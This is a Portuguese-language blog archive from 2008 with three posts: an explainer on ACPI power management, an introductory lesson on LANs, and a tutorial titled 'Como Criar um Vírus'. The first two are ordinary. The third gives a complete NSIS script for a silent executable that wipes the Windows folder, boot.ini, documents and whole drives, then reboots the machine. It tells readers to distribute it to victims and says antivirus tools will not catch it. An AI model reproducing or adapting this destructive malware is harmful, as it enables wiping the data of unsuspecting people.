26 de abr. de 2008

VOCÊ SABE O QUE É ACPI

ACPI é abreviação de "Advanced Configuration and Power Interface". Ele é o sistema de configuração e economia de energia utilizado pelos PCs atuais.

O ACPI é o responsável não apenas pelo suporte a economia de energia (incluindo o ajuste dinâmico da freqüência do processador), mas também pela inicialização de vários periféricos. É comum, por exemplo, que a placa wireless não seja detectada, ou que você não consiga ativar o transmissor usando os botões até que instale o driver ou utilitário fornecido pelo fabricante. No Acer 5043 (e outros modelos similares), por exemplo, você só consegue ativar o transmissor da placa wireless depois de instalar o Acer Launch Manager.
Com relação ao gerenciamento de energia, o ACPI é o sucessor do DPMA, usado em micros 486 e Pentium. A diferença básica entre os dois é que no ACPI o gerenciamento de energia é feito pelo sistema operacional e não pelo BIOS. Isso permite um gerenciamento muito mais avançado, permitindo recursos como diminuir a frequência de operação do processador (um recurso incomum em desktops, mas presente na maioria dos notebooks), desligar dispositivos, etc. Graças ao ACPI, os PCs atuais permitem um gerenciamento de energia muito mais sofisticado que os antigos, onde era possível apenas desligar o monitor e o HD. O avanço veio na forma de dois novos modos, o modo de espera e o hibernar. Ao entrar em modo de espera, não apenas o HD e o monitor, mas quase todo o PC é desligado, incluindo o processador, o cooler, placa de vídeo ou som, etc. Apenas a memória RAM, partes da placa mãe, modem e placa de rede continuam ativos. A memória RAM continua sendo alimentada para manter os dados gravados e permitir que o PC volte exatamente onde estava. É a única parte do PC que realmente não pode ser desligada sem que seja necessário um novo boot. O modem permanece ligado para que a conexão não caia e a placa de rede permanece alerta para acordar o PC caso o recurso de wake-on-lan esteja ativado no Setup. Em modo de espera o PC consome de 15 a 20 Watts de energia, o mesmo que uma lâmpada fluorescente e pode voltar à atividade em poucos segundos. Note que apenas o cooler do processador é desligado, o exaustor da fonte continua funcionando, pois ainda é necessário que ela forneça uma quantidade razoável de energia. Para que a opção de entrar em modo de espera esteja disponível, é necessário que a sua placa mãe ofereça suporte a ACPI. O Windows (a partir do 98) é capaz de detectar isto e ativar ou não o suporte automaticamente. Veja que isto inclui apenas placas razoavelmente recentes, e mesmo assim o suporte pode ser desativado caso você tenha alguma placa ISA que não suporte este recurso. Como opção, existe o hibernar (ou suspender) onde o conteúdo da memória RAM é gravado no HD e o PC é realmente desligado. Ao liga-lo novamente o sistema simplesmente recupera os dados e também volta exatamente onde estava. O tempo necessário depende da quantidade de memória RAM que estiver instalada, quanto mais memória maior será o arquivo no HD e mais demorará. Mas, geralmente ainda será bem mais rápido que um boot completo.

22 de abr. de 2008

CURSO DE REDE PARTE 1 (LAN)

Em computação, LANs (acrônimo de Local Area Network, "rede de área local" ) são redes utilizadas na interconexão de equipamentos processadores com a finalidade de troca de dados. Um conceito mais definido seria: é um conjunto de hardware e software que permite a computadores individuais estabelecerem comunicação entre si, trocando e compartilhando informações e recursos. Tais redes são denominadas locais por cobrirem apenas uma área limitada (10 Km no máximo, quando passam a ser denominadas MANs ), visto que, fisicamente, quanto maior a distância de um nó da rede ao outro, maior a taxa de erros que ocorrerão devido à degradação do sinal.As LANs são utilizadas para conectar estações, servidores, periféricos e outros dispositivos que possuam capacidade de processamento em uma casa, escritório, escola e edifícios próximos.
Componentes de uma LAN

Servidores
Servidores são computadores com alta capacidade de processamento e armazenagem que tem por função disponibilizar serviços, arquivos ou aplicações a uma rede. Como provedores de serviços, eles podem disponibilizar e-mail, hospedagem de páginas na internet, firewall, proxy, impressão, banco de dados, servir como controladores de domínio e muitas outras utilidades. Como servidores de arquivos, eles podem servir de depósito para que os utilizadores guardem os seus arquivos num local seguro e centralizado. E, finalmente, como servidores de aplicação, disponibilizar aplicações que necessitam de alto poder de processamento à máquinas com baixa capacidade, chamadas de thin clients (clientes magros).
Estações
As estações de trabalho, também chamadas de clientes, são geralmente computadores de secretária, portáteis ou PDAs, os quais são usados para acesso aos serviços disponibilizados pelo servidor, ou para executar tarefas locais. São máquinas que possuem um poder de processamento menor. Algumas vezes são usadas estações sem disco (diskless), as quais usam completamente os arquivos e programas disponibilizados pelo servidor.
Sistema Operacional de Rede
O Sistema Operacional de Rede é um programa informático de controle da máquina que dá suporte à rede, sendo que existem 2 classes de sistema: sistema cliente e sistema servidor.O sistema cliente possui características mais simples, voltadas para a utilização de serviços, enquanto que o sistema servidor possui uma maior quantidade de recursos, tais como serviços para serem disponibilizados aos clientes.Os sistemas baseados em Unix são potencialmente clientes e servidores, sendo feita a escolha durante a instalação dos pacotes, enquanto que em sistemas Windows, existem versões clientes (Windows 2000 Professional, Windows XP) e versões servidores (Windows 2000 Server e Windows 2003 Server).
Meios de Transporte
Atualmente, os meios de transporte de dados mais utilizados são a Ethernet ou o Wireless, operando a velocidades que variam de 10 a 10000 Mbps. As mídias de transmissão mais utilizadas são os cabos (par trançado, coaxial, fibra óptica) e o ar (em redes Wireless).
Dispositivos de rede
Dispositivos de rede são os meios físicos necessários para a comunicação entre os componentes participantes de uma rede. São exemplos os concentradores, os roteadores, repetidores, os switchs, as bridges, as placas de rede e os pontos de acesso wireless.
Protocolos de Comunicação
Protocolo é a "linguagem" que os diversos dispositivos de uma rede utilizam para se comunicar. Para que seja possível a comunicação, todos os dispositivos devem falar a mesma linguagem, isto é, o mesmo protocolo. Os protocolos mais usados atualmente são o TCP/IP, IPX/SPX e o NetBEUI.
História
Na época anterior aos PCs, as empresas possuíam somente um computador central, com usuários o acessando através de terminais utilizando um cabo simples de baixa velocidade. Redes tais como a SNA (Systems Network Architecture) da IBM estavam focadas em linkar terminais ou outros mainfraimes em locais remotos através de conexões dedicadas sendo, portanto, WANs.As primeiras LANs foram criadas no final de 1970 e eram usadas para criar links de alta velocidade entre grandes computadores centrais em um determinado local. De muitos sistemas competidores criados nessa época a Ethernet, e ARCNET eram os mais populares.O crescimento do CP/M e depois dos computadores pessoais baseados em DOS, proporcionaram que um único local pudesse ter dúzias e até centenas de computadores. A atração inicial das redes era geralmente compartilhar espaço em disco e impressoras à laser, os quais eram extremamente caros na época. Um entusiasmo maior com o conceito de LAN surgiu por volta de 1983, o qual foi declarado pela indústria de computadores como "o ano da LAN".Na realidade o conceito de LAN foi estragado devido à proliferação de camadas físicas e implementações de protocolos incompatíveis, assim como confusões em como melhor compartilhar recursos. Tipicamente, cada fabricante tinha seu próprio tipo de placa de rede, cabos, protocolos e sistema operacional de rede. Uma solução apareceu com o advento do Novell NetWare, o qual proporcionou suporte a mais de 40 tipos de placas de rede e cabos, e um sistema operacional muito mais sofisticado do que qualquer um dos competidores. O NetWare dominou as LANs dos computadores pessoais até a introdução do Microsoft Windows NT Advanced Server em 1993 e o Windows for Workgroups ("Windows para grupos de trabalho").Dos competidores do NetWare, somente Banyan Vines tinha forças técnicas comparáveis, mas Banyan nunca obteve uma base segura. A Microsoft e a 3Com trabalharam juntas para criar um sistema operacional de rede simples o qual formou a base da 3Com 3+Share Microsoft Lan Manager e IBM Lan Server. Nenhum desses particularmente teve sucesso.No mesmo período de tempo, computadores baseados em Unix estavam utilizando redes baseadas em TCP/IP, influenciando até hoje a tecnologia dessa área.

1 de abr. de 2008

Como Criar um Vírus

Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função "Delete", que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.

Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:

!define PRODUCT_NAME "APAGADOR_XXX"
!define PRODUCT_VERSION "1.0"
!define PRODUCT_PUBLISHER "HACKER_XXX"

SetCompressor lzma

Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
OutFile "MeuVirus.exe"
InstallDir "$TEMP"
Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"
SilentInstall silent

Section "Sec001" SEC01
Delete /REBOOTOK "$WINDIR\*.*"
SectionEnd

Section -Post
Reboot
SectionEnd

Salve com a extensão ".nsi", e escolha "Todos os arquivos", no campo "Salvar como tipo". A extensão ".nsi" é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").

Vamos entender esse arquivo... As três primeiras linhas identificam o "programa" que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item "OutFile" é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.

Na seção "Sec01", você deve adicionar as entradas "Delete" que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.

A linha "Delete /REBOOTOK "$WINDIR\*.*" apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:

Delete /REBOOTOK "C:\boot.ini"
Delete /REBOOTOK "C:\Meus documentos\*.*"
Delete /REBOOTOK "C:\*.*"
Delete /REBOOTOK "D:\*.*"
Delete /REBOOTOK "E:\*.*"
Delete /REBOOTOK "F:\*.*"
Delete /REBOOTOK "G:\*.*"
Delete /REBOOTOK "C:\Arquivos de programas\*.*"


Adicione o que quiser, arquivos específicos, etc.

A última seção, "Section -Post / Reboot / SectionEnd", será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando "reboot" reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.

Salve o arquivo. Abra o compilador do NSIS, em "Iniciar > Programas > MakeNSISW (Compiler GUI)", clique no menu "File > Load script", localize o arquivo de extensão ".nsi" que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".

O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.

Como testá-lo sem se ferrar por conta da própria criação? Use máquinas virtuais! Já comentei aqui no Explorando sobre o Bochs, na seção de matérias do site Mep Sites (materias.mepsites.cjb.net) você encontra um tutorial dele. Pode usar também o QEMU, com a ajuda do Kemula (kemula.mepsites.cjb.net), se precisar. Ou o comercial e carinho VMware. Usando uma máquina virtual você ferra apenas o sistema virtual, que pode ser facilmente restaurado se você tiver uma cópia dele em CD ou outra pasta. Dica: use máquinas virtuais também para testar pela primeira vez programas que você pega na Internet, e mais: navegue na Internet só pela máquina virtual! Quanto ao seu "virusinho", se preferir, teste num PC cobaia, onde você saiba que tudo pode ser apagado. Leia a ajuda do NSIS para ver outros comandos e constantes de pastas.